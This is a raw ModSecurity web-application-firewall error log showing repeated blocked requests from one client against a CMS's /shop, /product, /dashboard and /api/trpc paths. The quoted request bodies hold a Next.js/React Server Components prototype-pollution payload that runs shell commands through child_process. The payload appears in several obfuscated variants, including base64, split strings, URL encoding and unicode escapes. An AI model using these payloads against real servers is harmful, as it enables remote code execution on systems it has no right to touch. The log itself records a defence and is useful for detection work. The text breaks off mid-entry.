Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzLxQSOrq_iRTM7dpywAAAQU"] [Sun Apr 05 15:42:37.107512 2026] [:error] [pid 22788:tid 22798] [client 172.94.9.253:43718] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzSLbhFL16Wsx-C9DAgAAAYg"] [Sun Apr 05 15:42:37.107590 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:43756] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dpzAAAARY"] [Sun Apr 05 15:42:37.107723 2026] [:error] [pid 1308:tid 1348] [client 172.94.9.253:43770] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzSj-HYEhJWFlG6ErhgAAAEQ"] [Sun Apr 05 15:42:37.107855 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:43738] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dpzQAAAQ0"] [Sun Apr 05 15:42:37.108973 2026] [:error] [pid 22788:tid 22805] [client 172.94.9.253:43712] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzSLbhFL16Wsx-C9DAwAAAY8"] [Sun Apr 05 15:42:37.109327 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:43724] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzbxQSOrq_iRTM7dp0AAAAQM"] [Sun Apr 05 15:42:37.109942 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:43764] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzbxQSOrq_iRTM7dpzgAAARA"] [Sun Apr 05 15:42:37.120768 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:43706] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzbxQSOrq_iRTM7dp0QAAAQI"] [Sun Apr 05 15:42:37.120781 2026] [:error] [pid 22788:tid 22808] [client 172.94.9.253:43690] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzSLbhFL16Wsx-C9DBAAAAZI"] [Sun Apr 05 15:42:37.138386 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:43746] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmzbxQSOrq_iRTM7dpzwAAAQ4"] [Sun Apr 05 15:42:37.217209 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:43812] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzZc83uMXRUE9zvQTAgAAAcU"] [Sun Apr 05 15:42:37.219116 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:43782] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp0wAAAQM"] [Sun Apr 05 15:42:37.222512 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:43870] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp1AAAAQs"] [Sun Apr 05 15:42:37.224362 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:43794] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzZc83uMXRUE9zvQTAwAAAcE"] [Sun Apr 05 15:42:37.225737 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:43816] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp1QAAARI"] [Sun Apr 05 15:42:37.233751 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:43840] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp1gAAARA"] [Sun Apr 05 15:42:37.240434 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:43826] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzZc83uMXRUE9zvQTBAAAAc8"] [Sun Apr 05 15:42:37.248721 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:43880] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp1wAAAQU"] [Sun Apr 05 15:42:37.248721 2026] [:error] [pid 31198:tid 31260] [client 172.94.9.253:43798] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzTT5TgrBR8xRnfXA9wAAAUg"] [Sun Apr 05 15:42:37.261322 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:43842] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file 